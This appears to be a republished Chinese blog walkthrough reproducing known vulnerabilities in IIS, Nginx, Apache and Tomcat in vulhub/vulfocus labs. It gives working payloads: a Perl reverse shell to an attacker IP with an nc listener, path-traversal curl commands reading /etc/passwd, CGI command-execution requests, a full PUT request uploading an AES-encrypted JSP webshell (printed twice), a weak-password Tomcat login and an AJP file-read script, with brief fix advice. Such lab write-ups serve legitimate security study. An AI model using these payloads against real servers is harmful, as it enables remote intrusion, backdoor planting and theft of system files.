中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

这篇具有很好参考价值的文章主要介绍了中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等

1、中间件-IIS-短文件&解析&蓝屏等

2、中间件-Nginx-文件解析&命令执行等

3、中间件-Apache-RCE&目录遍历&文件解析等

4、中间件-Tomcat-弱口令&文件上传&文件包含等

中间件-IIS安全问题

中间件-IIS-短文件&解析&蓝屏等安全问题:

1、短文件:信息收集

2、文件解析

3、HTTP.SYS:蓝屏崩溃,略有破坏性

4、CVE-2017-7269 条件比较老旧

中间件-Nginx安全问题

Nginx详解

Nginx是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力在同类型的网页服务器中表现较好。

中间件-Nginx-文件解析&命令执行等安全问题:

1、后缀解析 文件名解析 配置不当:该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 CVE-2013-4547:影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

2、cve_2021_23017

相关文章:cve_2021_23017

3、cve_2017_7529

相关文章:cve_2017_7529

漏洞复现

Nginx 解析漏洞复现

靶场:vulhub

参考:nginx解析漏洞复现

开启环境:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

访问:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

上传:

上传一个正常的图片,图片当中带着我们的php语句

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

访问图片,在图片后面加上/.php

语句被成功解析并执行:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

可利用此来上传木马,从而进行getshell。

Nginx 文件名逻辑漏洞

漏洞原理:

主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。

靶场:vulhub

参考:CVE-2013-4547

开启环境:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

访问:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

上传.gif文件

这个环境是黑名单验证,我们无法上传php后缀的文件。我们上传一个“1.gif ”,注意后面的空格:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

访问http://your-ip:8080/uploadfiles/3.gif[0x20][0x00].php,即可发现php语句已被解析执行(当做php脚本语言进行执行):

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

修改16进制数值:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

解析执行:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

同理利用该漏洞,上传木马,可getshell。

中间件-Apache-RCE&目录遍历&文件解析等安全问题漏洞复现

详解:Apache详解

Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。

安全问题:

1、cve_2021_42013 RCE代码执行

2、cve_2021_41773 目录穿越

3、cve-2017-15715 文件解析

漏洞复现

CVE_2021_42013 RCE代码执行(Apache RCE)

描述:

Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。

靶场:vulfocus

开启靶场:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

访问:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

payload:
//修改请求方式为POST
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
//数据包内容为:
echo;perl -e 'use Socket;$i="192.168.100.1";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'


//完整数据包:
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: 192.168.100.134:11559
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

echo;perl -e 'use Socket;$i="192.168.100.1";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
反弹shell命令:
echo;perl -e 'use Socket;$i="攻击者ip";$p=监听端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

开启监听

nc -lvvp 8888

发送数据包,等待过后,成功反弹:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

执行命令:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

CVE_2021_41773 目录穿越(Apache目录遍历)

Apache HTTP 服务器项目旨在为包括 UNIX 和 Windows 在内的现代操作系统开发和维护开源 HTTP 服务器。

在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。

如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果还为这些别名路径启用了 CGI 脚本,则可能允许远程执行代码。

靶场:vulhub

或vulfocus

参考:Apache HTTP 服务器 2.4.49 中的路径遍历和文件泄露漏洞

开启环境:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

访问界面:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

在vulfocus当中开启靶场环境,访问界面:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

访问:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

payload:
//抓包,发送以下请求数据内容
GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
...

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

一个简单的 curl 命令来重现漏洞(请注意,必须是现有目录):/icons/

payload:
查看/etc/passwd文件
curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

查看/etc/group文件
curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/group

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

已成功披露:/etc/passwd

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

已成功披露:/etc/group

命令执行RCE:
payload:
curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

curl -v --data "echo;ls" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

成功回显

查看目录:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

CVE-2017-15715 文件解析(Apache HTTPD 换行解析漏洞)

Apache HTTPD是一款HTTP服务器。其2.4.0~2.4.29版本存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

环境:vulhub

漏洞复现详解:Apache HTTPD 换行解析漏洞(CVE-2017-15715)

中间件-Tomcat安全问题-弱口令&文件上传&文件包含等漏洞复现

描述:Tomcat详解

Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为比较流行的Web 应用服务器。

安全问题:

1、Tomcat弱口令

2、Tomcat文件上传

3、Tomcat文件包含

漏洞复现

Tomcat弱口令

靶场:vulfocus

开启环境:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

访问:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

点击管理后台应用,尝试弱口令

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

尝试账号和密码为:tomcattomcat(也可以使用burp进行爆破)

弱口令成功进入后台:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

可使用哥斯拉生成jsp后门,打包压缩成zip,然后重命名为war后缀文件,进行上传,即可getshell

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

修改后,进行上传

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

进入后台,然后进行上传该文件:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

输入账号密码后,成功上传:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

点击进入目录,访问后门:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

尝试连接:

成功连接并进入

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

后面文件以及目录:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

Tomcat文件上传(CVE-2017-12615)

漏洞介绍:

描述:

Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。

当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行, 导致服务器上的数据泄露或获取服务器权限。

影响版本:

Apache Tomcat 7.0.0 - 7.0.79

靶场:vulfocus

开启靶场:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

访问:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

进行上传,上传一个1.jsp文件,抓取数据包,修改数据包内容,将后面内容写在请求体当中

PUT /1.jsp/ HTTP/1.1
Host: 192.168.100.134:64009
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=71F2B8B297CF95B8EDC83C14222858FA
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 2617

<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>

jsp后门代码:

<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>

发送数据包即可:

上传1.jsp文件

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

修改完成后,发送数据包即可:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

回到界面,尝试访问:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

上传成功,使用哥斯拉进行连接,getshell

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

修复方案:

1、配置readonly和VirtualDirContext值为True或注释参数,禁止使用PUT方法并重启tomcat

注意:如果禁用PUT方法,对于依赖PUT方法的应用,可能导致业务失效。

2、根据官方补丁升级最新版本

Tomcat文件包含(CVE-2020-1938)

描述:

Apache Tomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行。

影响版本:

Tomcat 6.

Tomcat 7. < 7.0.100

Tomcat 8.* < 8.5.51

Tomcat 9.* < 9.0.31

靶场:vulfocus

开启环境:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

访问界面:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

Tomcat-Ajp协议文件读取漏洞

  • 自动化脚本CNVD-2020-10487-Tomcat-Ajp-lfi
python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py you-ip -p AJP协议(默认端口8009)端口 -f WEB-INF/web.xml	//读取的文件路径

// -p 对应的端口
// -f 参数选择要包含的文件

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

执行结果:

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现,Web安全,漏洞复现,中间件,apache,网络安全,web安全,nginx,tomcat

修复加固方法:

  1. 将tomcat升级到9.0.31、8.5.51或者7.0.100版本
  2. 禁止使用AJP协议
  3. 配置secret来设置AJP协议的认证凭证
Tomcat 反序列化 (CVE-2020-9484)
Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。

成功利用此漏洞需要同时满足以下4个条件: 
1.攻击者能够控制服务器上文件的内容和文件名称; 
2.服务器PersistenceManager配置中使用了FileStore; 
3.PersistenceManager中的sessionAttributeValueClassNameFilter被配置为“null”,或者过滤器不够严格,导致允许攻击者提供反序列化数据的对象; 
4.攻击者知道使用的FileStore存储位置到攻击者可控文件的相对路径

该漏洞利用条件较为苛刻,可升级版本进行防护。文章来源地址https://www.toymoban.com/news/detail-722548.html

到了这里,关于中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现

    中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等 1、中间件-Weblogic安全 2、中间件-JBoos安全 3、中间件-Jenkins安全 4、中间件-GlassFish安全 常见中间件的安全测试: 1、配置

    2024年02月08日
    浏览(42)
  • 中间件安全-CVE 复现&K8s&Docker&Jetty&Websphere漏洞复现

    中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等。 中间件所披露的问题: 中间件安全-IISApacheTomcatNginx漏洞复现 中间件安全-WeblogicJenkinsGlassFish漏洞复现 1、中间

    2024年02月08日
    浏览(51)
  • 第60天-服务攻防-中间件安全&CVE 复现&Weblogic&&Jboss&Jenkins&GlassFish

    文章仅供学习交流,一些漏洞没能复现出来(菜就多练),日后来兴趣再补坑(大概~) 视频链接:  【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训_哔哩哔哩_bilibili https://www.bilibili.com/video/BV1pQ4y1s7kH 目录 一、知识点 1、中间件-Weblogic-CVE 2、中间件-JBoos-CVE 3、中间件-Jenkin

    2024年02月19日
    浏览(41)
  • 中间件安全:Apache Tomcat 弱口令.(反弹 shell 拿到服务器的最高控制权.)

    Tomcat  是 Apache 软件基金会(Apache Software Foundation)的 Jakarta 项目中的一个核心项目,由 Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署 war 包 geshell . 中间件安全:Apache Tomcat 弱口令. Apache Tomcat 弱口令: 靶场准备:Web安全:Vulfocus 靶场搭建.(漏

    2024年02月05日
    浏览(65)
  • tomcat中间件漏洞复现

    Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性

    2024年02月10日
    浏览(51)
  • 【精选】中间件 tomcat漏洞复现

    目录 1、tomcat后台弱口令漏洞利用 利用冰蝎连接: 2、tomcat远程代码执行漏洞 利用冰蝎子连接: 利用冰蝎连接: 靶场: 124.70.71.251:49586 利用冰蝎的 shell.jsp 文件 利用冰蝎子连接:

    2024年01月21日
    浏览(52)
  • 中间件安全IIS----文件解析漏洞利用

          IIS服务器主要存在两种解析缺陷:文件夹解析漏洞和分号截断漏洞。下面就来分别具体 了解一下。        在IS5x和6.0下对于录名称为“xasp”中的任何内容,包括“1.jpg”这样的图片文件,都会被当作ASP文件解析。例如“/example.asp/1.jpg”,这本来是一个图片资源,但是

    2024年01月18日
    浏览(43)
  • 中间件安全—Tomcat常见漏洞

      整个复现环境均使用Vulhub一键搭建漏洞测试靶场,Vulhub靶场:链接 1.2.1.漏洞原理   Tomcat配置文件/conf/web.xml 配置了可写(readonly=false),导致可以使用PUT方法上传任意文件,攻击者将精心构造的payload向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被

    2024年02月08日
    浏览(59)
  • 中间件安全—Apache常见漏洞

      简单介绍一下apache是什么,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将python等解释器编译到服务器中。 1.2.1.漏洞

    2024年01月22日
    浏览(51)
  • Apache Tomcat 安全漏洞(CVE-2020-13935)复现

    漏洞详情: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。 影响版

    2024年02月11日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包